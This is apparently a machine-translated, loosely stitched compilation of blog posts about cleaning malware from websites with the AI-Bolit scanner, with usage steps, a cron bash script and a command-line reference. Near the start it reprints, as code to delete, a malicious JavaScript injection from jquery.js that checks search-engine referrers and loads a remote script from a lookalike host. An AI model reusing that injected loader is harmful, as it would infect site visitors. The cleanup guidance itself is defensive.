Today they asked me for help in cleaning an online store from viruses. Unexpectedly, one of the employees received a refusal to advertise Google Adwords. The letter indicated that in the file jquery.js A suspicious code has been entered.
First of all, I opened the path to this file using a browser, but Avast antivirus did not react to this file in any way, although visually I already saw the malicious code. I then connected via ftp using FileZilla and tried opening the file using Notepad++. And here my antivirus blocked access to this file.
To clean the js file from the virus, I had to disable AVAST for 10 minutes and then remove malicious lines from the file.
If you encounter a similar problem, remove the following code as shown in the picture, or these lines.
Var r=document.referrer; var c=document.cookie; r1=0; if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; ) else (if (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";)) if (((c.indexOf("__ga1" )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-analyzing .com/urchin.js" type="text/javascript"%3E%3C/script%3E"));)
Site backup.
Next, we connect via ssh access, for example, using the putty utility and, if possible, make an archive of the site. To do this, just use the following command in the console:
tar - cf backup .tar /home/login/site/public_html
*/home/login/site/public_html - full path to the main directory of the site
You don’t have to make a backup of the site, but how likely will it be to delete something important?
There are now two options for checking a website for viruses
1. Check the site with using php Ai-Bolit script, which searches for various viruses as well as php shell.
2. Download the entire site to your computer and run it with Avast antivirus, but the first option is much better, more convenient, and much higher quality.
Cleaning a site on your local computer
I first used the second method, so I’ll describe that one. After all the files (or archive) were downloaded to the computer, and there were quite a few 25,000 of them, I opened Avast and specified the folder with the site files to scan them for malicious scripts.
After Avast performed a scan, two script viruses were detected in the website files folder:
- Php-Shell-Jv
- Js-Redirector-Fc
The index.php file consisted of the following code:
The javascript file "ui.datepicker_old.js" had malicious code at the very bottom of the script content. This code must be removed!
Cleaning a website from viruses using Ai-Bolit.
Ftp method.
1. Download the archive with the Aibolit script to your local computer and unpack it.
2. Connect via ftp using the FileZilla client
3. Place the unpacked archive files in the main directory of the site /home/your site/public_html
4. Run the script http://your domain/ai-bolit.php
5. The report file will be created in the main directory with the name AI-BOLIT-REPORT.html
If after running the script it displays a blank White screen, which means the php version on the hosting server is not suitable for Aibolit.
Attention! If you need to check all sites in a directory, upload the script to the /home/domains/ or /home/ folder, then Ai-Bolit will recursively go through all the folders and issue a report, but it seems to me that it is better to check one domain at a time.
Console option (SSH)
1. Launch the Putty program, or another console program.
2. Connect to the server using the host and password.
3. Go to the main directory of the site with the command cd /home/your login/your website/public_html/
4. Load the script with the command wget http://www..zip
5. Unpack the zip archive with the command unzip 20160904_112415ai-bolit.zip
6. Run the script php ai-bolit.php
To run in background use the command: screen -d -m php ai-bolit.php
7. We are waiting for the script to perform the check and create a report like " AI-BOLIT-REPORT.html" on server.
Please also note that if php is installed on your server below 5.3, Aibolit will show an error and will not start scanning. In my case, I had to download the site and check it on my server.
After the report file is created on the server, you can download it to your computer and view it with a regular browser (Chrome, Firefox, etc.).
First of all, you should pay attention to the report on “Malicious scripts”, and then either carefully delete these files or clean them manually, as I do.
I was looking on the Internet for a free “paid” theme for the site. Fortunately, there are enough such sites. True, they copy each other =) From experience with such templates, I knew that sometimes you have to pay in full for such freebies. Because such templates are very difficult good people they insert all sorts of nasty things that can cause very big trouble for decent programmers. I remember that my ESET antivirus I used to find and curse at base64. Now he doesn’t swear either. What I mean is that if you check with an antivirus, it will not help.
Before Ai-Bolit, I checked files with Total Commander for the contents of certain words and, depending on what I found, I checked and corrected them. But this is a very tedious task. And I set out to find a more optimal and fast decision search. And it was found. This - AI-Bolit is a unique free script for searching for viruses, Trojans, backdoors, and hacker activities on hosting.
And so, what this script can do:
- look for viruses, all sorts of malicious and hacker scripts on the hosting: shells based on signatures, shells based on simple heuristics - everything that ordinary antiviruses are simply not able to find.
- work with all the most popular cms without exception, including joomla, wordpress, drupal, bitrix...
- look for redirects in .htaccess to malicious sites
- look for code sape/trustlink/linkfeed in. php file Oh
- define doorways
- show directories open for writing
- look for invisible links in templates
Why is this script needed?
An experienced hacker can hack almost any website. And your website may be no exception. What is the danger of website hacking? After gaining access to the site, an attacker can do the following:
- "drain" your traffic to your projects
- downloads the contents of the server and database for sale to third parties
- will replace contact or payment information on the site
- downloads personal data of users
- will place doorways with spam links on your website
- will introduce viruses, Trojans or exploits onto website pages, infecting visitors
- sends spam from your server
- will sell access to the hacked site to other attackers for subsequent unauthorized penetration
- and so on... It's sad. Yes?
Ai-Bolit allows you to promptly detect a lot of malware and suspicious changes on your hosting, reducing the risk of being banned search engines for the spread of viruses and the presence of doorways. It also allows you to promptly learn about possible potential information leaks and other troubles regarding your site. COOL!!!
How to use the script
The script archive contains VERY clear instructions. By default, the "doctor" scans in normal mode with a minimum number of signatures and a minimum number of false positives.
There are two verification options. They are both described in the instructions. I will give only the first - simplified one.
Launch option from browser (not recommended as it only performs express scanning)
- Download archive with script (see attached files)
- Unpack.zip
- Change the password in the line define("PASS", "put_any_strong_password_here_8_symbols_min");
- Enable "expert" mode in the line define("AI_EXPERT", 0); // replace 0 with 1
- copy files from the /ai-bolit/ folder to the server in the root directory
- copy files from the know_files folder that correspond to your cms
- open http://sitename.com/ai-bolit.php?p=My456Pass123 in your browser and wait for the report
- !!!after displaying the report, delete the files from Aibolit and the script itself from the site!!!
That's all. Then, a report will appear in front of you and all you have to do is follow the errors and fix vulnerabilities.
Feedback
The author is a very friendly person. Always answers. If you have any suggestions or questions, please write to:
web: http://www.revisium.com/ai/
e-mail: [email protected]
skype: greg_zemskov
There is a problematic situation - a site with viruses.
Now I will show how this virus can be easily found and destroyed. The first thing you need to do is download the site to the locale - it’s much easier to check an array of files.
This text is from the video description, so it is a little chaotic and dull. However, the rest of my writings)
We will download filezilla. I will download immediately to the installed one local server– Open Server – in order to be able to run it locally, you will suddenly need it.
If you have an antivirus installed that scans files on the fly, there is a chance that you will find viruses in some files even during downloading. Look in the logs of my antivirus.
In my case, my Microsoft Security did not show anything - the virus was unknown to it.
To search, I will use a special antivirus - Aibolit. Developer website http://revisium.com/ai/
I advise you to come and watch the seminar. The files are still being downloaded, it will take a long time. I already have it ready local copy, I was playing with this antivirus yesterday.
So, for work we still need php for windows. Download here http://windows.php.net/download/ latest version for Windows in zip archive. Unpack somewhere you feel comfortable.
OK. The preparations are over. Now to work.
Download the archive with iBolit.
There are three folders inside:
- ai-bolit is the actual core of the antivirus
- known_files – versions of anti-virus file databases for different engines
- tools – auxiliary utility.
So, let's start treating the site for viruses.
- Copy all files from the ai-bolit folder to the root of the site
- If we know what engine we have, we select the folder with our CMS in the known_files folder and put all the files in the root. In my case, the WordPress engine, then we will treat viruses with antivirus databases for WordPress. If you want to check everything, you can antivirus databases fill in from all engines - maybe he will find something more)
- I forgot again - you need to specify the expert operating mode in the iBolit settings. For this text editor open the file ai-bolit.php and find the line define(‘AI_EXPERT’, 0); change “0” to “1” and that’s it – expert mode is turned on.
- Now we need to unpack our zip archive with php into some folder where it would be convenient to work with it. We need a file - php.exe
- Now we need to run the executable file of our antivirus. To do this, double-click on ai-bolit.php. I already have a choice of how to run this script.
I would advise keeping only the uploads folder and your theme folder. All plugins will be downloaded, the settings will remain in the database - viruses will not touch them. Check the theme manually all the files - fortunately there are not many of them there, if the site was not laid out by a clumsy layout designer. And refill everything else in the engine. this is the most reliable way.
And I also remind you that you most likely have viruses throughout your entire hosting account (very rarely they manage to jump between the accounts of different users, only if the hosting administrator is a crooked person.)
If for some reason iBolit is removed from the site, you can always download the antivirus for the site from me
Viruses are sad(
PS: two articles on how to clean already found viruses:
- Simpler - How to remove a virus from a website yourself for free
- For advanced -
Probably everyone who creates websites encounters viruses and Trojans on the site. The first problem is to notice the problem in time, before the projects become pessimistic from search engines or become burdensome to the hoster (for DDoS, spam).
This article is being written in hot pursuit when, during a routine backup to a machine running Windows, the source code of the ESET website Smart Security suddenly he began to swear at the pictures, which he considered to be a virus. It turned out that the FilesMan backdoor was uploaded to the site using the pictures.
The hole was that the script that allowed users to upload pictures to the site checked that the picture was being loaded only by the file extension. The content has not been checked at all. There is no need to do this;) As a result, any PHP file could be uploaded to the site under the guise of an image. But we're not talking about holes...
The point is that the task arose of daily checking all site files for viruses and Trojans.
Checking a website for viruses online
Online checks of any website for viruses are not suitable for these purposes at all. Online scanners behave like a search engine robot, sequentially going through everything available pages site. The transition to the next page of the site occurs through links from other pages of the site. Resp. if an attacker uploaded a backdoor to your site using a picture and there is no link to this picture anywhere on the site pages and did not deface the site, just like putting a virus on the pages, then online check The website for viruses simply won’t find this picture and won’t find the virus.
Why, you ask, would an attacker do this? Why upload a backdoor and do nothing? I’ll answer – for spam, for DDoS. For other malicious activity that is not reflected in any way on the site pages.
In a word, checking a website online for viruses is completely useless for complete peace of mind.
Plugin for checking a WordPress site for viruses and Trojans
There is an excellent antivirus plugin for WordPress. It's called . In my case, it perfectly found pictures from FilesMan and cleaned the site from viruses. But he has important drawback. During the scan, it puts a huge load on the server because it simply goes through all the files sequentially. In addition, checking out of the box is done only manually. It is not possible to automate site verification with a plugin.
Well, you can catch a virus without using WordPress, you need something universal.
Checking site content with a regular antivirus
As mentioned above, the problems were discovered completely by accident by a regular desktop antivirus during a backup. Of course, you can download the entire site every day and scan it with a regular antivirus. All this is quite workable.
- firstly, I want automation. So that the check is in automatic mode and based on the results there was a finished report.
- secondly, there are sites that downloading them every time is simply not realistic,
Trying AI-Bolit
I delayed something with the introduction. As a result of all the searches, a wonderful one was found FREE antivirus for site. . This antivirus means different schemes its use. I used it via ssh.
I haven’t figured out whether it can be used on shared hosting, but I think it’s possible. AI-Bolit is written in PHP and can be launched from a browser. Therefore, purely technically, it’s probably possible on a shared platform.
Important! Aibolit does not treat a website for viruses - it ONLY FINDS them and gives a report which files it considers dangerous. And you decide what to do with them yourself. Therefore, simply stupidly pressing a button and curing the site from Trojans will not work.
How to use AI-Bolit on VDS with ssh
Aibolit has instructions and master classes on using this antivirus. In general, the sequence is simple:
- download
- unpack to the server (I unpacked to /root/ai)
- then from the ssh console run php /root/ai/ai-bolit/ai-bolit.php
- verification may take hours, depending on the size of the site
- Based on the results of the check, a report file AI-BOLIT-REPORT- will be generated<дата>-<время>.html
The report file will show problematic files, if any.
Heavy load on the server
The main problem you encounter when automatically checking a website for viruses is the load on the server. All antiviruses operate in the same way, sequentially searching through all available files. And aibolit seems to be no exception here. It simply takes all the files and checks them one by one. The load jumps and this can last a long time, which is not acceptable in production.
But Aybolit has an amazing opportunity (provided that you have a full-fledged server or VDS with root access). First, for Aibolit, you can generate a list of files to check, and then feed this list. Then Aibolit will simply run through this list.
To generate a list, you can use any server method. I ended up with this bash script:
# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="site" AI_PATH="/root/ai" NOW=$(date +" %F-%k-%M-%S") # you can make a public folder with password access REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Scan only files changed in X days # AI-BOLIT-DOUBLECHECK.php is hardcoded by AIbolit at --with-2check !!! find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c
# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN = "site" AI_PATH = "/root/ai" NOW = $(date + "%F-%k-%M-%S") # you can make a public folder with password access REPORT_PATH = "$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH = "/home/azzrael/web/$DOMAIN/public_html/" SCAN_DAYS = 90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH php "$AI_PATH/ai-bolit/ai-bolit.php"-- mode = 1 -- report = $REPORT_PATH -- with - 2check #history -c |
Here you can see that through the find command we collect all the files created during the last SCAN_DAYS, save them to the list AI-BOLIT-DOUBLECHECK.php (by the way, it was impossible to rename the list file at the time of use), then feed this list to Aibolit. SCAN_DAYS can be equal to one day. If you put bash /root/ai/run.sh in the daily cron, then the list of files to be scanned may not be very large. Resp. the check will not take much time and will not heavily load the server.
The greatest functionality is available when starting the AI-BOLIT scanner in mode command line. This can be done both under Windows/Unix/Mac OS X, and directly on hosting, if you have access via SSH and hosting does not greatly limit the consumed processor resources.
Please note that to run the scanner, a console version of PHP 7.1 and higher is required. More early versions are not officially supported. Check current version php -v command
Help with AI-BOLIT scanner command line parameters
Show help
php ai-bolit.php --help
php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov
Scan only certain extensions
php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl
Prepare a quarantine file for sending to security specialists. An archive AI-QUARANTINE-XXXX.zip with a password will be created.
php ai-bolit.php --quarantine
Run the scanner in “paranoid” mode (recommended to get the most detailed report)
php ai-bolit.php --mode=2
php ai-bolit.php --mode=1
Check one file "pms.db" for malicious code
php ai-bolit.php -jpms.db
Run the scanner with a memory size of 512Mb
php ai-bolit.php --memory=512M
Set the maximum scanned file size to 900Kb
php ai-bolit.php --size=900K
Pause 500ms between files when scanning (to reduce load)
php ai-bolit.php --delay=500
Send scan report by email [email protected]
php ai-bolit.php [email protected]
Create a report in the file /home/scanned/report_site1.html
php ai-bolit.php --report=/home/scanned/report_site1.html
Scan the /home/s/site1/public_html/ directory (the default report will be created there if the --report=report_file option is not specified)
php ai-bolit.php --path=/home/s/site1/public_html/
Execute the command when scanning is complete.
php ai-bolit.php --cmd="~/postprocess.sh"
Get a report in plain text with the name site1.txt
php ai-bolit.php -lsite1.txt
You can combine calls, for example,
php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected
By combining the call of the AI-BOLIT scanner with others unix commands, you can perform, for example, batch scanning of sites. Below is an example of checking several sites hosted within an account. For example, if sites are located inside the /var/www/user1/data/www directory, then the command to launch the scanner will be
find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;
By adding the --report parameter, you can control the directory in which scan reports will be generated.
php ai-bolit.php list of parameters... --eng
Switch the report interface to English. This parameter should come last.
Integration with other services and into the hosting panel
php ai-bolit.php --json_report=/path/file.json
Generate a report in json format
php ai-bolit.php --progress=/path/progress.json
Save the verification status to a file in json format. This file will contain structured data in json format: current scan file, how many files have been scanned, how many files are left to scan, scan percentage, time until scanning is completed. This mechanism can be used to show a progress bar and data about the files being scanned in the panel. Once the scan is complete, the file is deleted automatically.
php ai-bolit.php --handler=/path/hander.php
External event handler. You can add your own scan start/end/scan progress/scan error handlers. An example file can be viewed in the scanner archive, in the tools/handler.php directory. For example, after scanning is completed, you can do something with the report file (send by mail, archive, etc.).
